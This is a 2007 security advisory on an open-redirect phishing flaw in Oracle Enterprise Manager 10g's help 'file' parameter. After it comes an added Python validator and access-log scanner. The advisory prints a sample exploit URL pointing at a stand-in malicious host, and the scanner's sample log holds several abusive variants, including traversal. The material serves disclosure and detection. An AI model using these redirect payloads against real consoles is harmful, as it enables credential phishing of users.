oem-redir.txt
Posted on 27 March 2007
Source: packetstormsecurity.org
Product: Oracle Enterprise Manager
Vulnerability: Phishing (the help link can be made to redirect to an attacker-controlled URL)
Level: Medium
By: Handrix <handrix_at_morx_org>
25 March 2007
MorX security research team
www.morx.org
The Oracle Enterprise Manager help function is vulnerable to a phishing attack:
the "file" parameter of the help topic page accepts an arbitrary URL, so an
attacker can send a link that points at the legitimate server but lands the
user on an attacker-controlled page, where the login and password entered are
captured by the attacker.
In any case, verify the full content (and the address) of the login page
before entering sensitive information.
Another workaround is to deactivate the help link.
Sample request (the "file" parameter carries the attacker's URL):
http://www.victimeserver.com:5500/em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/
Version: Oracle Enterprise Manager 10g
Other versions may also be affected.
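The defect in the sample request is that the help handler follows whatever it is given in "file", including a full URL to another host. The following is an added example, written for this page and not code from Oracle or from the advisory's author: it shows the input check such a handler needs (a relative path that stays under the help tree, nothing with a scheme or host, nothing that climbs out with ../) and reuses that check to scan web-server access log lines for requests that abuse the parameter. The help path "/em/console/help/" is assumed from the advisory's sample URL, the host "oms.example" is a placeholder, and the log lines are constructed for the example. This is an illustration of the check and of the detection, not the vendor's fix; the remediation for the product itself is the vendor patch or disabling the help link as the advisory suggests.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed layout, taken from the advisory's sample request: help topics live under
# this path and the handler receives the topic to display in the "file" parameter.
HELP_ROOT = "/em/console/help/"


def is_safe_help_file(value: str) -> bool:
    """Accept only a relative path that stays under HELP_ROOT once normalised.

    This is the check the help handler lacks: the advisory's request puts a full
    http:// URL in "file" and the console follows it.
    """
    decoded = unquote(value)
    # The web tier has already URL-decoded the parameter once; if decoding it
    # again changes it, the value was multiply encoded to slip past filters.
    if unquote(decoded) != decoded:
        return False
    parts = urlsplit(decoded)
    # Absolute (http://host/...) and scheme-relative (//host/...) targets are
    # exactly the redirect cases; any other scheme (javascript:, data:) goes too.
    if parts.scheme or parts.netloc:
        return False
    # No absolute paths, backslashes or control characters.
    if decoded.startswith("/") or "\\" in decoded or any(c in decoded for c in "\x00\r\n"):
        return False
    # Resolve ../ segments and confirm the result is still inside the help tree.
    resolved = posixpath.normpath(posixpath.join(HELP_ROOT, decoded))
    root = HELP_ROOT.rstrip("/")
    return resolved == root or resolved.startswith(root + "/")


def classify_request(url: str) -> str:
    """Label a console request: 'redirect' when the help file parameter points
    outside the help tree, 'ok' when it is a plain topic path, 'n/a' when the
    request is not a help topic request carrying a file parameter."""
    parts = urlsplit(url)
    if not parts.path.startswith(HELP_ROOT):
        return "n/a"
    params = parse_qs(parts.query, keep_blank_values=True)
    if "file" not in params:
        return "n/a"
    return "ok" if all(is_safe_help_file(v) for v in params["file"]) else "redirect"


# Request part of a Common/Combined Log Format entry: method, target, protocol.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def scan_access_log(lines):
    """Return (line_number, request_target) for entries that abuse the help file
    parameter. The placeholder scheme and host are prefixed only so urlsplit
    sees a full URL; a server-side log records path and query only."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match and classify_request("http://oms.example" + match.group(1)) == "redirect":
            hits.append((number, match.group(1)))
    return hits


# Constructed access-log lines (not from any real server): one legitimate topic
# request, three abusive variants, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Mar/2007:10:00:01 +0100] "GET /em/console/help/fr/topic?inOHW=false&linkHelp=false&file=fr/ohw/intro.htm HTTP/1.1" 200 4120',
    '10.0.0.9 - - [25/Mar/2007:10:00:07 +0100] "GET /em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Mar/2007:10:00:09 +0100] "GET /em/console/help/fr/topic?file=//www.maliciousserver.dot/em/console/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Mar/2007:10:00:11 +0100] "GET /em/console/help/fr/topic?file=..%2F..%2F..%2Flogon%2Flogon HTTP/1.1" 200 512',
    '10.0.0.7 - - [25/Mar/2007:10:00:12 +0100] "GET /em/console/logon/logon HTTP/1.1" 200 9810',
]

if __name__ == "__main__":
    for number, target in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: suspicious help request {target}")
```

Run as a script it flags the three abusive lines; is_safe_help_file() is deliberately conservative (an absolute path under the help root is refused as well), since the goal is to let through only plain topic paths rather than to enumerate bad ones.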